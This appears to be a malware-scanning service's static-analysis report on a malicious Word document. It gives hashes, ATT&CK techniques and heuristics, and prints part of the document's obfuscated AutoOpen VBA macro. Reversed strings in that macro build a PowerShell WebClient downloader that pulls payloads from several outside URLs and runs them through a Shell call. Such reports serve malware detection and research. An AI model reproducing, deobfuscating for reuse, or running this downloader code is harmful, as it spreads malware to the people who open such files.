Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 352db6e3d588f3d3…

MALICIOUS

Office (OLE)

173.5 KB Created: 2018-05-08 05:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 2ba8c60e9063cf18123f118b435c843e SHA-1: eea32233b10d9860347df68d7e08aa977e94de8d SHA-256: 352db6e3d588f3d341b60f3d09fc5a18ddf2694d05703744ef0bf19403e3d4dd
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OLE document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The script contains a call to the 'Shell' function, which is highly suspicious and likely used to download and execute a secondary payload. The obfuscated nature of the script prevents a more detailed analysis of its exact function.

Heuristics 5

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 177,664 bytes but its declared streams total only 36,034 bytes — 141,630 bytes (80%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41612 bytes
SHA-256: e8e4a9ab77a4928fbc8cb5fba0e29ed3088aa229796744bc84559b8ab1632d5b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "baYpFlDs"
Sub Enqpod(FzTjbn)
Dim IJmlRR, XkEWEY
nzoit = 15996 = DBpXj
wVPtj = sPfSzm - CStr(51966) + jCmSkE - Tan(83101) - 34045 / 94758 / (60083 - CBool(8680) * 65327 / hFIzOk)
Dim kCVKp, jkHhp
SNUAOX = 75954 = UjYkpz
LKXVl = VKijc - CStr(55188) + YGJQq - Tan(24337) - 28895 / 34161 / (23558 - CBool(7956) * 88570 / aJlEil)
End Sub
Sub qoWIzJRHICjmBE(MFqQwMiDfXJM As String)
On Error Resume Next
Dim qHVak, EpzDq
muTDN = 43258 = tckrw
dvKsk = AvHlM - CStr(6951) + ZElWRO - Tan(41704) - 69474 / 15421 / (60642 - CBool(13773) * 11529 / hWrsG)
Dim WTHQt, NzqYiI
zhzDH = 11114 = cdWVP
mMXiD = fwhMS - CStr(77662) + ZERfLd - Tan(44265) - 99659 / 12665 / (81123 - CBool(70850) * 35709 / montwm)
[Shell] qKAZM + Chr(vbKeyC) + MFqQwMiDfXJM + QdLSUfPP + OLzKssDjWnL, lCrHA + 0 + lCrHA
Dim brIoQ, oBPDrT
MtooVF = 6694 = GZcvm
HndimA = pmDdE - CStr(98604) + OQLTiT - Tan(60557) - 98407 / 28354 / (84281 - CBool(1052) * 63902 / AURfs)
Dim ljNlYF, qXHlK
GcEqO = 18382 = SOIYl
FszUVX = aNuBim - CStr(26379) + cIrdh - Tan(67507) - 51323 / 60895 / (91889 - CBool(57925) * 5293 / bLWYo)
End Sub

Attribute VB_Name = "zTtDuoJT"
Sub JQsAi(XOzin)
Dim psowL, kBWctl
pabIK = 79400 = mfHkEK
ufEcQp = JbEGiD - CStr(47109) + whWHt - Tan(79979) - 66056 / 91307 / (12315 - CBool(78591) * 87359 / XJkEs)
End Sub
Function zDiNvbRjd()
On Error Resume Next
Dim DpVSz, vHfwWB
lHUjaO = 93590 = rMkwn
hbzqA = hziwd - CStr(65015) + MmJjYE - Tan(24517) - 15010 / 99554 / (5495 - CBool(50562) * 19937 / vkMdlU)
Dim pcjzI, fEmHln
XiXFJ = 34711 = VQWXUG
zJDiX = NvSuv - CStr(14860) + QNJops - Tan(20847) - 88920 / 85011 / (87817 - CBool(90502) * 39710 / wrYGI)
jFMZDj = JWzoLF("YTP9'+' + ci'+'l'+'b'+'up:vne2vD = '+'CD'+'S'+'2'+'vD;)o'+'Z9'+'@oZ9(t'+'ilpS.oZ9sE3D8", 78392 - 78392 + 6 + 78392 - 78392, 78392 - 78392 + 78 + 78392 - 78392)
Dim BVjuiY, UzcQd
BiOIH = 65675 = cviHQI
FUVWM = SGRkSb - CStr(30398) + XNRbQl - Tan(36859) - 75637 / 69476 / (67952 - CBool(34272) * 45874 / AFrZda)
Dim XrdsSi, XcvRKz
cGwKGq = 45844 = nnsHsk
ailCb = zmwihu - CStr(99211) + rAqjX - Tan(18190) - 52656 / 110 / (80148 - CBool(2921) * 70452 / uEpAL)
WPUKOTCs = JWzoLF("o1OT6+'UYY2vD;modn'+'ar '+')o'+'Z9to'+'Z'+'9+oZ9c'+'ejbo'+'-woZ9+oZ9eo'+'Z'+'9+oZ9'+'no'+'Z9(& = dsad'+'asn2v'+'D'((iq", 20244 - 20244 + 3 + 20244 - 20244, 20244 - 20244 + 111 + 20244 - 20244)
Dim DLCQjH, wdUAb
wYKvn = 4613 = Ualapj
Xwuww = rroQb - CStr(37995) + KajGzN - Tan(54045) - 77832 / 60626 / (68995 - CBool(17217) * 5019 / kVcZbb)
Dim zKURu, ToAjiE
BEqqht = 51309 = VlEQJl
VhcQKK = TkARJB - CStr(33534) + QrzZu - Tan(82935) - 78408 / 52892 / (61727 - CBool(2544) * 41913 / bYQBlv)
LDItjYhVE = JWzoLF("BjMOc:Vne$ (.|)29]rAHC[,)67]rAHC[+08]rAHC[+MuUdkQ6", 94564 - 94564 + 8 + 94564 - 94564, 94564 - 94564 + 41 + 94564 - 94564)
Dim STERu, CkFqPj
SBVMQ = 68824 = IjFvPo
XuUzj = hwALa - CStr(9041) + rGjlQR - Tan(93637) - 43399 / 49923 / (5876 - CBool(7354) * 70926 / ELmNI)
Dim wZzzpU, NXuZU
TiRdSb = 68558 = vJkCLw
WpSiB = PIzVmj - CStr(15277) + kUiui - Tan(84766) - 15443 / 39383 / (42389 - CBool(13959) * 44173 / BBQOw)
cRzbYJth = JWzoLF("cC68e'+'ilCbeW'+'.'+'t'+'eN.'+'m'+'etsy'+'S )oZ'+'9'+'tce'+'jbo-oZ9+oZ9'1R", 3809 - 3809 + 3 + 3809 - 3809, 3809 - 3809 + 68 + 3809 - 3809)
Dim Wlqhbv, GDVSI
rbcKoB = 16414 = FKCTLH
aOskYI = WRCtn - CStr(54360) + omCOb - Tan(59625) - 82173 / 48179 / (82361 - CBool(53672) * 24118 / zQaoOP)
Dim Hoojad, wtpfz
DQjvLh = 86094 = biORj
bjmHi = jioddj - CStr(39080) + mQtpRa - Tan(66706) - 96616 / 73163 / (38979 - CBool(39892) * 87168 / KfKaSq)
uHHaFhmZNcV = JWzoLF("MU50aB'+'u/m'+'oc.onikab//'+':'+'ptth@/XxYS'+'/su'+'.'+'ne'+'gac'+'//:ptth@/S'+'gaHG'+'0/mo'+'c'+'.puorg'+'icapra//:ptth@/hGXvYB/ku.'+'oc.ygol'+'o'+'nhc'+'et-'+'tna'+'rel'c", 76430 - 76430 + 2 + 76430 - 76430, 76430 - 76430 + 166 + 76430 - 76430)
Dim tQGhw, FVbDRb
CfKkY = 42 = mduSn
NYCiCL = LzVKMs - CStr(34414) + NWiCs - Tan(62571) - 70471 / 61135 / (41406 - CBool(48685) * 4005 / jWQVo)
Dim fTkdwV, EiJUs
qzSmW = 99239 = ifjnT
Nrvbh = SddEPV - CStr(24645) + anXCC - Tan(369
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.